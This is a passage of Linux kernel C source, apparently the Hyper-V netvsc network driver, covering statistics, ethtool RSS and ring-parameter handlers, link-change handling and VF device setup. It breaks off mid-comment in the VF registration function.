| nvdev = rndis_filter_device_add(hdev, &device_info); 1263 | 1264 | if (vf_netdev) 1265 | dev_set_mtu(vf_netdev, orig_mtu); 1266 | 1267 | if (IS_ERR(nvdev)) { 1268 | netdev_err(ndev, "restoring mtu failed: %ld\n", 1269 | PTR_ERR(nvdev)); 1270 | return ret; 1271 | } 1272 | } 1273 | 1274 | if (was_opened) 1275 | rndis_filter_open(nvdev); 1276 | 1277 | netif_device_attach(ndev); 1278 | 1279 | /* We may have missed link change notifications */ 1280 | schedule_delayed_work(&ndevctx->dwork, 0); 1281 | 1282 | return ret; 1283 | } 1284 | 1285 | static void netvsc_get_vf_stats(struct net_device *net, 1286 | struct netvsc_vf_pcpu_stats *tot) 1287 | { 1288 | struct net_device_context *ndev_ctx = netdev_priv(net); 1289 | int i; 1290 | 1291 | memset(tot, 0, sizeof(*tot)); 1292 | 1293 | for_each_possible_cpu(i) { 1294 | const struct netvsc_vf_pcpu_stats *stats 1295 | = per_cpu_ptr(ndev_ctx->vf_stats, i); 1296 | u64 rx_packets, rx_bytes, tx_packets, tx_bytes; 1297 | unsigned int start; 1298 | 1299 | do { 1300 | start = u64_stats_fetch_begin_irq(&stats->syncp); 1301 | rx_packets = stats->rx_packets; 1302 | tx_packets = stats->tx_packets; 1303 | rx_bytes = stats->rx_bytes; 1304 | tx_bytes = stats->tx_bytes; 1305 | } while (u64_stats_fetch_retry_irq(&stats->syncp, start)); 1306 | 1307 | tot->rx_packets += rx_packets; 1308 | tot->tx_packets += tx_packets; 1309 | tot->rx_bytes += rx_bytes; 1310 | tot->tx_bytes += tx_bytes; 1311 | tot->tx_dropped += stats->tx_dropped; 1312 | } 1313 | } 1314 | 1315 | static void netvsc_get_stats64(struct net_device *net, 1316 | struct rtnl_link_stats64 *t) 1317 | { 1318 | struct net_device_context *ndev_ctx = netdev_priv(net); 1319 | struct netvsc_device *nvdev = rcu_dereference_rtnl(ndev_ctx->nvdev); 1320 | struct netvsc_vf_pcpu_stats vf_tot; 1321 | int i; 1322 | 1323 | if (!nvdev) 1324 | return; 1325 | 1326 | netdev_stats_to_stats64(t, &net->stats); 1327 | 1328 | netvsc_get_vf_stats(net, &vf_tot); 1329 | t->rx_packets += vf_tot.rx_packets; 1330 | t->tx_packets += vf_tot.tx_packets; 1331 | t->rx_bytes += vf_tot.rx_bytes; 1332 | t->tx_bytes += vf_tot.tx_bytes; 1333 | t->tx_dropped += vf_tot.tx_dropped; 1334 | 1335 | for (i = 0; i < nvdev->num_chn; i++) { 1336 | const struct netvsc_channel *nvchan = &nvdev->chan_table[i]; 1337 | const struct netvsc_stats *stats; 1338 | u64 packets, bytes, multicast; 1339 | unsigned int start; 1340 | 1341 | stats = &nvchan->tx_stats; 1342 | do { 1343 | start = u64_stats_fetch_begin_irq(&stats->syncp); 1344 | packets = stats->packets; 1345 | bytes = stats->bytes; 1346 | } while 
(u64_stats_fetch_retry_irq(&stats->syncp, start)); 1347 | 1348 | t->tx_bytes += bytes; 1349 | t->tx_packets += packets; 1350 | 1351 | stats = &nvchan->rx_stats; 1352 | do { 1353 | start = u64_stats_fetch_begin_irq(&stats->syncp); 1354 | packets = stats->packets; 1355 | bytes = stats->bytes; 1356 | multicast = stats->multicast + stats->broadcast; 1357 | } while (u64_stats_fetch_retry_irq(&stats->syncp, start)); 1358 | 1359 | t->rx_bytes += bytes; 1360 | t->rx_packets += packets; 1361 | t->multicast += multicast; 1362 | } 1363 | } 1364 | 1365 | static int netvsc_set_mac_addr(struct net_device *ndev, void *p) 1366 | { 1367 | struct net_device_context *ndc = netdev_priv(ndev); 1368 | struct net_device *vf_netdev = rtnl_dereference(ndc->vf_netdev); 1369 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1370 | struct sockaddr *addr = p; 1371 | int err; 1372 | 1373 | err = eth_prepare_mac_addr_change(ndev, p); 1374 | if (err) 1375 | return err; 1376 | 1377 | if (!nvdev) 1378 | return -ENODEV; 1379 | 1380 | if (vf_netdev) { 1381 | err = dev_set_mac_address(vf_netdev, addr); 1382 | if (err) 1383 | return err; 1384 | } 1385 | 1386 | err = rndis_filter_set_device_mac(nvdev, addr->sa_data); 1387 | if (!err) { 1388 | eth_commit_mac_addr_change(ndev, p); 1389 | } else if (vf_netdev) { 1390 | /* rollback change on VF */ 1391 | memcpy(addr->sa_data, ndev->dev_addr, ETH_ALEN); 1392 | dev_set_mac_address(vf_netdev, addr); 1393 | } 1394 | 1395 | return err; 1396 | } 1397 | 1398 | static const struct { 1399 | char name[ETH_GSTRING_LEN]; 1400 | u16 offset; 1401 | } netvsc_stats[] = { 1402 | { "tx_scattered", offsetof(struct netvsc_ethtool_stats, tx_scattered) }, 1403 | { "tx_no_memory", offsetof(struct netvsc_ethtool_stats, tx_no_memory) }, 1404 | { "tx_no_space", offsetof(struct netvsc_ethtool_stats, tx_no_space) }, 1405 | { "tx_too_big", offsetof(struct netvsc_ethtool_stats, tx_too_big) }, 1406 | { "tx_busy", offsetof(struct netvsc_ethtool_stats, tx_busy) }, 1407 | { "tx_send_full", offsetof(struct netvsc_ethtool_stats, tx_send_full) }, 1408 | { "rx_comp_busy", offsetof(struct netvsc_ethtool_stats, rx_comp_busy) }, 1409 | }, vf_stats[] = { 1410 | { "vf_rx_packets", offsetof(struct netvsc_vf_pcpu_stats, rx_packets) }, 1411 | { "vf_rx_bytes", offsetof(struct netvsc_vf_pcpu_stats, rx_bytes) }, 1412 | { "vf_tx_packets", offsetof(struct netvsc_vf_pcpu_stats, tx_packets) }, 1413 | { "vf_tx_bytes", offsetof(struct netvsc_vf_pcpu_stats, tx_bytes) }, 1414 | { "vf_tx_dropped", offsetof(struct netvsc_vf_pcpu_stats, tx_dropped) }, 1415 | }; 1416 | 1417 | #define NETVSC_GLOBAL_STATS_LEN ARRAY_SIZE(netvsc_stats) 1418 | #define NETVSC_VF_STATS_LEN ARRAY_SIZE(vf_stats) 1419 | 1420 | /* 4 statistics per queue (rx/tx packets/bytes) */ 1421 | #define NETVSC_QUEUE_STATS_LEN(dev) ((dev)->num_chn * 4) 1422 | 1423 | static int netvsc_get_sset_count(struct net_device *dev, int string_set) 1424 | { 1425 | struct net_device_context *ndc = netdev_priv(dev); 1426 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1427 | 1428 | if (!nvdev) 1429 | return -ENODEV; 1430 | 1431 | switch (string_set) { 1432 | case ETH_SS_STATS: 1433 | return NETVSC_GLOBAL_STATS_LEN 1434 | + NETVSC_VF_STATS_LEN 1435 | + NETVSC_QUEUE_STATS_LEN(nvdev); 1436 | default: 1437 | return -EINVAL; 1438 | } 1439 | } 1440 | 1441 | static void netvsc_get_ethtool_stats(struct net_device *dev, 1442 | struct ethtool_stats *stats, u64 *data) 1443 | { 1444 | struct net_device_context *ndc = netdev_priv(dev); 1445 | struct netvsc_device *nvdev = 
rtnl_dereference(ndc->nvdev); 1446 | const void *nds = &ndc->eth_stats; 1447 | const struct netvsc_stats *qstats; 1448 | struct netvsc_vf_pcpu_stats sum; 1449 | unsigned int start; 1450 | u64 packets, bytes; 1451 | int i, j; 1452 | 1453 | if (!nvdev) 1454 | return; 1455 | 1456 | for (i = 0; i < NETVSC_GLOBAL_STATS_LEN; i++) 1457 | data[i] = *(unsigned long *)(nds + netvsc_stats[i].offset); 1458 | 1459 | netvsc_get_vf_stats(dev, &sum); 1460 | for (j = 0; j < NETVSC_VF_STATS_LEN; j++) 1461 | data[i++] = *(u64 *)((void *)&sum + vf_stats[j].offset); 1462 | 1463 | for (j = 0; j < nvdev->num_chn; j++) { 1464 | qstats = &nvdev->chan_table[j].tx_stats; 1465 | 1466 | do { 1467 | start = u64_stats_fetch_begin_irq(&qstats->syncp); 1468 | packets = qstats->packets; 1469 | bytes = qstats->bytes; 1470 | } while (u64_stats_fetch_retry_irq(&qstats->syncp, start)); 1471 | data[i++] = packets; 1472 | data[i++] = bytes; 1473 | 1474 | qstats = &nvdev->chan_table[j].rx_stats; 1475 | do { 1476 | start = u64_stats_fetch_begin_irq(&qstats->syncp); 1477 | packets = qstats->packets; 1478 | bytes = qstats->bytes; 1479 | } while (u64_stats_fetch_retry_irq(&qstats->syncp, start)); 1480 | data[i++] = packets; 1481 | data[i++] = bytes; 1482 | } 1483 | } 1484 | 1485 | static void netvsc_get_strings(struct net_device *dev, u32 stringset, u8 *data) 1486 | { 1487 | struct net_device_context *ndc = netdev_priv(dev); 1488 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1489 | u8 *p = data; 1490 | int i; 1491 | 1492 | if (!nvdev) 1493 | return; 1494 | 1495 | switch (stringset) { 1496 | case ETH_SS_STATS: 1497 | for (i = 0; i < ARRAY_SIZE(netvsc_stats); i++) { 1498 | memcpy(p, netvsc_stats[i].name, ETH_GSTRING_LEN); 1499 | p += ETH_GSTRING_LEN; 1500 | } 1501 | 1502 | for (i = 0; i < ARRAY_SIZE(vf_stats); i++) { 1503 | memcpy(p, vf_stats[i].name, ETH_GSTRING_LEN); 1504 | p += ETH_GSTRING_LEN; 1505 | } 1506 | 1507 | for (i = 0; i < nvdev->num_chn; i++) { 1508 | sprintf(p, "tx_queue_%u_packets", i); 1509 | p += ETH_GSTRING_LEN; 1510 | sprintf(p, "tx_queue_%u_bytes", i); 1511 | p += ETH_GSTRING_LEN; 1512 | sprintf(p, "rx_queue_%u_packets", i); 1513 | p += ETH_GSTRING_LEN; 1514 | sprintf(p, "rx_queue_%u_bytes", i); 1515 | p += ETH_GSTRING_LEN; 1516 | } 1517 | 1518 | break; 1519 | } 1520 | } 1521 | 1522 | static int 1523 | netvsc_get_rss_hash_opts(struct net_device_context *ndc, 1524 | struct ethtool_rxnfc *info) 1525 | { 1526 | info->data = RXH_IP_SRC | RXH_IP_DST; 1527 | 1528 | switch (info->flow_type) { 1529 | case TCP_V4_FLOW: 1530 | case TCP_V6_FLOW: 1531 | info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; 1532 | break; 1533 | 1534 | case UDP_V4_FLOW: 1535 | if (ndc->udp4_l4_hash) 1536 | info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; 1537 | 1538 | break; 1539 | 1540 | case UDP_V6_FLOW: 1541 | if (ndc->udp6_l4_hash) 1542 | info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; 1543 | 1544 | break; 1545 | 1546 | case IPV4_FLOW: 1547 | case IPV6_FLOW: 1548 | break; 1549 | default: 1550 | info->data = 0; 1551 | break; 1552 | } 1553 | 1554 | return 0; 1555 | } 1556 | 1557 | static int 1558 | netvsc_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *info, 1559 | u32 *rules) 1560 | { 1561 | struct net_device_context *ndc = netdev_priv(dev); 1562 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1563 | 1564 | if (!nvdev) 1565 | return -ENODEV; 1566 | 1567 | switch (info->cmd) { 1568 | case ETHTOOL_GRXRINGS: 1569 | info->data = nvdev->num_chn; 1570 | return 0; 1571 | 1572 | case ETHTOOL_GRXFH: 1573 | return 
netvsc_get_rss_hash_opts(ndc, info); 1574 | } 1575 | return -EOPNOTSUPP; 1576 | } 1577 | 1578 | static int netvsc_set_rss_hash_opts(struct net_device_context *ndc, 1579 | struct ethtool_rxnfc *info) 1580 | { 1581 | if (info->data == (RXH_IP_SRC | RXH_IP_DST | 1582 | RXH_L4_B_0_1 | RXH_L4_B_2_3)) { 1583 | if (info->flow_type == UDP_V4_FLOW) 1584 | ndc->udp4_l4_hash = true; 1585 | else if (info->flow_type == UDP_V6_FLOW) 1586 | ndc->udp6_l4_hash = true; 1587 | else 1588 | return -EOPNOTSUPP; 1589 | 1590 | return 0; 1591 | } 1592 | 1593 | if (info->data == (RXH_IP_SRC | RXH_IP_DST)) { 1594 | if (info->flow_type == UDP_V4_FLOW) 1595 | ndc->udp4_l4_hash = false; 1596 | else if (info->flow_type == UDP_V6_FLOW) 1597 | ndc->udp6_l4_hash = false; 1598 | else 1599 | return -EOPNOTSUPP; 1600 | 1601 | return 0; 1602 | } 1603 | 1604 | return -EOPNOTSUPP; 1605 | } 1606 | 1607 | static int 1608 | netvsc_set_rxnfc(struct net_device *ndev, struct ethtool_rxnfc *info) 1609 | { 1610 | struct net_device_context *ndc = netdev_priv(ndev); 1611 | 1612 | if (info->cmd == ETHTOOL_SRXFH) 1613 | return netvsc_set_rss_hash_opts(ndc, info); 1614 | 1615 | return -EOPNOTSUPP; 1616 | } 1617 | 1618 | #ifdef CONFIG_NET_POLL_CONTROLLER 1619 | static void netvsc_poll_controller(struct net_device *dev) 1620 | { 1621 | struct net_device_context *ndc = netdev_priv(dev); 1622 | struct netvsc_device *ndev; 1623 | int i; 1624 | 1625 | rcu_read_lock(); 1626 | ndev = rcu_dereference(ndc->nvdev); 1627 | if (ndev) { 1628 | for (i = 0; i < ndev->num_chn; i++) { 1629 | struct netvsc_channel *nvchan = &ndev->chan_table[i]; 1630 | 1631 | napi_schedule(&nvchan->napi); 1632 | } 1633 | } 1634 | rcu_read_unlock(); 1635 | } 1636 | #endif 1637 | 1638 | static u32 netvsc_get_rxfh_key_size(struct net_device *dev) 1639 | { 1640 | return NETVSC_HASH_KEYLEN; 1641 | } 1642 | 1643 | static u32 netvsc_rss_indir_size(struct net_device *dev) 1644 | { 1645 | return ITAB_NUM; 1646 | } 1647 | 1648 | static int netvsc_get_rxfh(struct net_device *dev, u32 *indir, u8 *key, 1649 | u8 *hfunc) 1650 | { 1651 | struct net_device_context *ndc = netdev_priv(dev); 1652 | struct netvsc_device *ndev = rtnl_dereference(ndc->nvdev); 1653 | struct rndis_device *rndis_dev; 1654 | int i; 1655 | 1656 | if (!ndev) 1657 | return -ENODEV; 1658 | 1659 | if (hfunc) 1660 | *hfunc = ETH_RSS_HASH_TOP; /* Toeplitz */ 1661 | 1662 | rndis_dev = ndev->extension; 1663 | if (indir) { 1664 | for (i = 0; i < ITAB_NUM; i++) 1665 | indir[i] = rndis_dev->ind_table[i]; 1666 | } 1667 | 1668 | if (key) 1669 | memcpy(key, rndis_dev->rss_key, NETVSC_HASH_KEYLEN); 1670 | 1671 | return 0; 1672 | } 1673 | 1674 | static int netvsc_set_rxfh(struct net_device *dev, const u32 *indir, 1675 | const u8 *key, const u8 hfunc) 1676 | { 1677 | struct net_device_context *ndc = netdev_priv(dev); 1678 | struct netvsc_device *ndev = rtnl_dereference(ndc->nvdev); 1679 | struct rndis_device *rndis_dev; 1680 | int i; 1681 | 1682 | if (!ndev) 1683 | return -ENODEV; 1684 | 1685 | if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP) 1686 | return -EOPNOTSUPP; 1687 | 1688 | rndis_dev = ndev->extension; 1689 | if (indir) { 1690 | for (i = 0; i < ITAB_NUM; i++) 1691 | if (indir[i] >= ndev->num_chn) 1692 | return -EINVAL; 1693 | 1694 | for (i = 0; i < ITAB_NUM; i++) 1695 | rndis_dev->ind_table[i] = indir[i]; 1696 | } 1697 | 1698 | if (!key) { 1699 | if (!indir) 1700 | return 0; 1701 | 1702 | key = rndis_dev->rss_key; 1703 | } 1704 | 1705 | return rndis_filter_set_rss_param(rndis_dev, key); 1706 | } 1707 | 1708 | 
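/* A worked example of the section arithmetic below, assuming the buffer
 * constants from this tree's hyperv_net.h (16 MiB receive buffer with
 * 1728-byte sections, 15 MiB send buffer with 6144-byte sections):
 * rx_max_pending = 16777216 / 1728 = 9709 sections and
 * tx_max_pending = 15728640 / 6144 = 2560 sections.
 */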
/* Hyper-V RNDIS protocol does not have ring in the HW sense. 1709 | * It does have pre-allocated receive area which is divided into sections. 1710 | */ 1711 | static void __netvsc_get_ringparam(struct netvsc_device *nvdev, 1712 | struct ethtool_ringparam *ring) 1713 | { 1714 | u32 max_buf_size; 1715 | 1716 | ring->rx_pending = nvdev->recv_section_cnt; 1717 | ring->tx_pending = nvdev->send_section_cnt; 1718 | 1719 | if (nvdev->nvsp_version <= NVSP_PROTOCOL_VERSION_2) 1720 | max_buf_size = NETVSC_RECEIVE_BUFFER_SIZE_LEGACY; 1721 | else 1722 | max_buf_size = NETVSC_RECEIVE_BUFFER_SIZE; 1723 | 1724 | ring->rx_max_pending = max_buf_size / nvdev->recv_section_size; 1725 | ring->tx_max_pending = NETVSC_SEND_BUFFER_SIZE 1726 | / nvdev->send_section_size; 1727 | } 1728 | 1729 | static void netvsc_get_ringparam(struct net_device *ndev, 1730 | struct ethtool_ringparam *ring) 1731 | { 1732 | struct net_device_context *ndevctx = netdev_priv(ndev); 1733 | struct netvsc_device *nvdev = rtnl_dereference(ndevctx->nvdev); 1734 | 1735 | if (!nvdev) 1736 | return; 1737 | 1738 | __netvsc_get_ringparam(nvdev, ring); 1739 | } 1740 | 1741 | static int netvsc_set_ringparam(struct net_device *ndev, 1742 | struct ethtool_ringparam *ring) 1743 | { 1744 | struct net_device_context *ndevctx = netdev_priv(ndev); 1745 | struct netvsc_device *nvdev = rtnl_dereference(ndevctx->nvdev); 1746 | struct hv_device *hdev = ndevctx->device_ctx; 1747 | struct netvsc_device_info device_info; 1748 | struct ethtool_ringparam orig; 1749 | u32 new_tx, new_rx; 1750 | bool was_opened; 1751 | int ret = 0; 1752 | 1753 | if (!nvdev || nvdev->destroy) 1754 | return -ENODEV; 1755 | 1756 | memset(&orig, 0, sizeof(orig)); 1757 | __netvsc_get_ringparam(nvdev, &orig); 1758 | 1759 | new_tx = clamp_t(u32, ring->tx_pending, 1760 | NETVSC_MIN_TX_SECTIONS, orig.tx_max_pending); 1761 | new_rx = clamp_t(u32, ring->rx_pending, 1762 | NETVSC_MIN_RX_SECTIONS, orig.rx_max_pending); 1763 | 1764 | if (new_tx == orig.tx_pending && 1765 | new_rx == orig.rx_pending) 1766 | return 0; /* no change */ 1767 | 1768 | memset(&device_info, 0, sizeof(device_info)); 1769 | device_info.num_chn = nvdev->num_chn; 1770 | device_info.ring_size = ring_size; 1771 | device_info.send_sections = new_tx; 1772 | device_info.send_section_size = nvdev->send_section_size; 1773 | device_info.recv_sections = new_rx; 1774 | device_info.recv_section_size = nvdev->recv_section_size; 1775 | 1776 | netif_device_detach(ndev); 1777 | was_opened = rndis_filter_opened(nvdev); 1778 | if (was_opened) 1779 | rndis_filter_close(nvdev); 1780 | 1781 | rndis_filter_device_remove(hdev, nvdev); 1782 | 1783 | nvdev = rndis_filter_device_add(hdev, &device_info); 1784 | if (IS_ERR(nvdev)) { 1785 | ret = PTR_ERR(nvdev); 1786 | 1787 | device_info.send_sections = orig.tx_pending; 1788 | device_info.recv_sections = orig.rx_pending; 1789 | nvdev = rndis_filter_device_add(hdev, &device_info); 1790 | if (IS_ERR(nvdev)) { 1791 | netdev_err(ndev, "restoring ringparam failed: %ld\n", 1792 | PTR_ERR(nvdev)); 1793 | return ret; 1794 | } 1795 | } 1796 | 1797 | if (was_opened) 1798 | rndis_filter_open(nvdev); 1799 | netif_device_attach(ndev); 1800 | 1801 | /* We may have missed link change notifications */ 1802 | ndevctx->last_reconfig = 0; 1803 | schedule_delayed_work(&ndevctx->dwork, 0); 1804 | 1805 | return ret; 1806 | } 1807 | 1808 | static const struct ethtool_ops ethtool_ops = { 1809 | .get_drvinfo = netvsc_get_drvinfo, 1810 | .get_link = ethtool_op_get_link, 1811 | .get_ethtool_stats = netvsc_get_ethtool_stats, 
1812 | .get_sset_count = netvsc_get_sset_count, 1813 | .get_strings = netvsc_get_strings, 1814 | .get_channels = netvsc_get_channels, 1815 | .set_channels = netvsc_set_channels, 1816 | .get_ts_info = ethtool_op_get_ts_info, 1817 | .get_rxnfc = netvsc_get_rxnfc, 1818 | .set_rxnfc = netvsc_set_rxnfc, 1819 | .get_rxfh_key_size = netvsc_get_rxfh_key_size, 1820 | .get_rxfh_indir_size = netvsc_rss_indir_size, 1821 | .get_rxfh = netvsc_get_rxfh, 1822 | .set_rxfh = netvsc_set_rxfh, 1823 | .get_link_ksettings = netvsc_get_link_ksettings, 1824 | .set_link_ksettings = netvsc_set_link_ksettings, 1825 | .get_ringparam = netvsc_get_ringparam, 1826 | .set_ringparam = netvsc_set_ringparam, 1827 | }; 1828 | 1829 | static const struct net_device_ops device_ops = { 1830 | .ndo_open = netvsc_open, 1831 | .ndo_stop = netvsc_close, 1832 | .ndo_start_xmit = netvsc_start_xmit, 1833 | .ndo_set_rx_mode = netvsc_set_multicast_list, 1834 | .ndo_change_mtu = netvsc_change_mtu, 1835 | .ndo_validate_addr = eth_validate_addr, 1836 | .ndo_set_mac_address = netvsc_set_mac_addr, 1837 | .ndo_select_queue = netvsc_select_queue, 1838 | .ndo_get_stats64 = netvsc_get_stats64, 1839 | #ifdef CONFIG_NET_POLL_CONTROLLER 1840 | .ndo_poll_controller = netvsc_poll_controller, 1841 | #endif 1842 | }; 1843 | 1844 | /* 1845 | * Handle link status changes. For RNDIS_STATUS_NETWORK_CHANGE emulate link 1846 | * down/up sequence. In case of RNDIS_STATUS_MEDIA_CONNECT when carrier is 1847 | * present send GARP packet to network peers with netif_notify_peers(). 1848 | */ 1849 | static void netvsc_link_change(struct work_struct *w) 1850 | { 1851 | struct net_device_context *ndev_ctx = 1852 | container_of(w, struct net_device_context, dwork.work); 1853 | struct hv_device *device_obj = ndev_ctx->device_ctx; 1854 | struct net_device *net = hv_get_drvdata(device_obj); 1855 | struct netvsc_device *net_device; 1856 | struct rndis_device *rdev; 1857 | struct netvsc_reconfig *event = NULL; 1858 | bool notify = false, reschedule = false; 1859 | unsigned long flags, next_reconfig, delay; 1860 | 1861 | /* if changes are happening, comeback later */ 1862 | if (!rtnl_trylock()) { 1863 | schedule_delayed_work(&ndev_ctx->dwork, LINKCHANGE_INT); 1864 | return; 1865 | } 1866 | 1867 | net_device = rtnl_dereference(ndev_ctx->nvdev); 1868 | if (!net_device) 1869 | goto out_unlock; 1870 | 1871 | rdev = net_device->extension; 1872 | 1873 | next_reconfig = ndev_ctx->last_reconfig + LINKCHANGE_INT; 1874 | if (time_is_after_jiffies(next_reconfig)) { 1875 | /* link_watch only sends one notification with current state 1876 | * per second, avoid doing reconfig more frequently. Handle 1877 | * wrap around. 1878 | */ 1879 | delay = next_reconfig - jiffies; 1880 | delay = delay < LINKCHANGE_INT ? 
delay : LINKCHANGE_INT; 1881 | schedule_delayed_work(&ndev_ctx->dwork, delay); 1882 | goto out_unlock; 1883 | } 1884 | ndev_ctx->last_reconfig = jiffies; 1885 | 1886 | spin_lock_irqsave(&ndev_ctx->lock, flags); 1887 | if (!list_empty(&ndev_ctx->reconfig_events)) { 1888 | event = list_first_entry(&ndev_ctx->reconfig_events, 1889 | struct netvsc_reconfig, list); 1890 | list_del(&event->list); 1891 | reschedule = !list_empty(&ndev_ctx->reconfig_events); 1892 | } 1893 | spin_unlock_irqrestore(&ndev_ctx->lock, flags); 1894 | 1895 | if (!event) 1896 | goto out_unlock; 1897 | 1898 | switch (event->event) { 1899 | /* Only the following events are possible due to the check in 1900 | * netvsc_linkstatus_callback() 1901 | */ 1902 | case RNDIS_STATUS_MEDIA_CONNECT: 1903 | if (rdev->link_state) { 1904 | rdev->link_state = false; 1905 | netif_carrier_on(net); 1906 | netif_tx_wake_all_queues(net); 1907 | } else { 1908 | notify = true; 1909 | } 1910 | kfree(event); 1911 | break; 1912 | case RNDIS_STATUS_MEDIA_DISCONNECT: 1913 | if (!rdev->link_state) { 1914 | rdev->link_state = true; 1915 | netif_carrier_off(net); 1916 | netif_tx_stop_all_queues(net); 1917 | } 1918 | kfree(event); 1919 | break; 1920 | case RNDIS_STATUS_NETWORK_CHANGE: 1921 | /* Only makes sense if carrier is present */ 1922 | if (!rdev->link_state) { 1923 | rdev->link_state = true; 1924 | netif_carrier_off(net); 1925 | netif_tx_stop_all_queues(net); 1926 | event->event = RNDIS_STATUS_MEDIA_CONNECT; 1927 | spin_lock_irqsave(&ndev_ctx->lock, flags); 1928 | list_add(&event->list, &ndev_ctx->reconfig_events); 1929 | spin_unlock_irqrestore(&ndev_ctx->lock, flags); 1930 | reschedule = true; 1931 | } 1932 | break; 1933 | } 1934 | 1935 | rtnl_unlock(); 1936 | 1937 | if (notify) 1938 | netdev_notify_peers(net); 1939 | 1940 | /* link_watch only sends one notification with current state per 1941 | * second, handle next reconfig event in 2 seconds. 1942 | */ 1943 | if (reschedule) 1944 | schedule_delayed_work(&ndev_ctx->dwork, LINKCHANGE_INT); 1945 | 1946 | return; 1947 | 1948 | out_unlock: 1949 | rtnl_unlock(); 1950 | } 1951 | 1952 | static struct net_device *get_netvsc_bymac(const u8 *mac) 1953 | { 1954 | struct net_device *dev; 1955 | 1956 | ASSERT_RTNL(); 1957 | 1958 | for_each_netdev(&init_net, dev) { 1959 | if (dev->netdev_ops != &device_ops) 1960 | continue; /* not a netvsc device */ 1961 | 1962 | if (ether_addr_equal(mac, dev->perm_addr)) 1963 | return dev; 1964 | } 1965 | 1966 | return NULL; 1967 | } 1968 | 1969 | static struct net_device *get_netvsc_byref(struct net_device *vf_netdev) 1970 | { 1971 | struct net_device *dev; 1972 | 1973 | ASSERT_RTNL(); 1974 | 1975 | for_each_netdev(&init_net, dev) { 1976 | struct net_device_context *net_device_ctx; 1977 | 1978 | if (dev->netdev_ops != &device_ops) 1979 | continue; /* not a netvsc device */ 1980 | 1981 | net_device_ctx = netdev_priv(dev); 1982 | if (!rtnl_dereference(net_device_ctx->nvdev)) 1983 | continue; /* device is removed */ 1984 | 1985 | if (rtnl_dereference(net_device_ctx->vf_netdev) == vf_netdev) 1986 | return dev; /* a match */ 1987 | } 1988 | 1989 | return NULL; 1990 | } 1991 | 1992 | /* Called when VF is injecting data into network stack. 1993 | * Change the associated network device from VF to netvsc. 
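 * The skb is requeued with skb->dev pointing at the synthetic device, and
 * returning RX_HANDLER_ANOTHER makes the stack run delivery again on it.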
1994 | * note: already called with rcu_read_lock 1995 | */ 1996 | static rx_handler_result_t netvsc_vf_handle_frame(struct sk_buff **pskb) 1997 | { 1998 | struct sk_buff *skb = *pskb; 1999 | struct net_device *ndev = rcu_dereference(skb->dev->rx_handler_data); 2000 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 2001 | struct netvsc_vf_pcpu_stats *pcpu_stats 2002 | = this_cpu_ptr(ndev_ctx->vf_stats); 2003 | 2004 | skb->dev = ndev; 2005 | 2006 | u64_stats_update_begin(&pcpu_stats->syncp); 2007 | pcpu_stats->rx_packets++; 2008 | pcpu_stats->rx_bytes += skb->len; 2009 | u64_stats_update_end(&pcpu_stats->syncp); 2010 | 2011 | return RX_HANDLER_ANOTHER; 2012 | } 2013 | 2014 | static int netvsc_vf_join(struct net_device *vf_netdev, 2015 | struct net_device *ndev) 2016 | { 2017 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 2018 | int ret; 2019 | 2020 | ret = netdev_rx_handler_register(vf_netdev, 2021 | netvsc_vf_handle_frame, ndev); 2022 | if (ret != 0) { 2023 | netdev_err(vf_netdev, 2024 | "can not register netvsc VF receive handler (err = %d)\n", 2025 | ret); 2026 | goto rx_handler_failed; 2027 | } 2028 | 2029 | ret = netdev_upper_dev_link(vf_netdev, ndev); 2030 | if (ret != 0) { 2031 | netdev_err(vf_netdev, 2032 | "can not set master device %s (err = %d)\n", 2033 | ndev->name, ret); 2034 | goto upper_link_failed; 2035 | } 2036 | 2037 | /* set slave flag before open to prevent IPv6 addrconf */ 2038 | vf_netdev->flags |= IFF_SLAVE; 2039 | 2040 | schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT); 2041 | 2042 | call_netdevice_notifiers(NETDEV_JOIN, vf_netdev); 2043 | 2044 | netdev_info(vf_netdev, "joined to %s\n", ndev->name); 2045 | return 0; 2046 | 2047 | upper_link_failed: 2048 | netdev_rx_handler_unregister(vf_netdev); 2049 | rx_handler_failed: 2050 | return ret; 2051 | } 2052 | 2053 | static void __netvsc_vf_setup(struct net_device *ndev, 2054 | struct net_device *vf_netdev) 2055 | { 2056 | int ret; 2057 | 2058 | /* Align MTU of VF with master */ 2059 | ret = dev_set_mtu(vf_netdev, ndev->mtu); 2060 | if (ret) 2061 | netdev_warn(vf_netdev, 2062 | "unable to change mtu to %u\n", ndev->mtu); 2063 | 2064 | if (netif_running(ndev)) { 2065 | ret = dev_open(vf_netdev); 2066 | if (ret) 2067 | netdev_warn(vf_netdev, 2068 | "unable to open: %d\n", ret); 2069 | } 2070 | } 2071 | 2072 | /* Setup VF as slave of the synthetic device. 2073 | * Runs in workqueue to avoid recursion in netlink callbacks. 2074 | */ 2075 | static void netvsc_vf_setup(struct work_struct *w) 2076 | { 2077 | struct net_device_context *ndev_ctx 2078 | = container_of(w, struct net_device_context, vf_takeover.work); 2079 | struct net_device *ndev = hv_get_drvdata(ndev_ctx->device_ctx); 2080 | struct net_device *vf_netdev; 2081 | 2082 | if (!rtnl_trylock()) { 2083 | schedule_delayed_work(&ndev_ctx->vf_takeover, 0); 2084 | return; 2085 | } 2086 | 2087 | vf_netdev = rtnl_dereference(ndev_ctx->vf_netdev); 2088 | if (vf_netdev) 2089 | __netvsc_vf_setup(ndev, vf_netdev); 2090 | 2091 | rtnl_unlock(); 2092 | } 2093 | 2094 | static int netvsc_register_vf(struct net_device *vf_netdev) 2095 | { 2096 | struct net_device *ndev; 2097 | struct net_device_context *net_device_ctx; 2098 | struct netvsc_device *netvsc_dev; 2099 | 2100 | if (vf_netdev->addr_len != ETH_ALEN) 2101 | return NOTIFY_DONE; 2102 | 2103 | /* 2104 | * We will use the MAC address to locate the synthetic interface to 2105 | * associate with the VF interface. If we don't find a matching 2106 | * synthetic interface, move on. 
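 * (The lookup is get_netvsc_bymac(), which compares the VF's permanent
 * MAC against each netvsc device's perm_addr under RTNL.)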
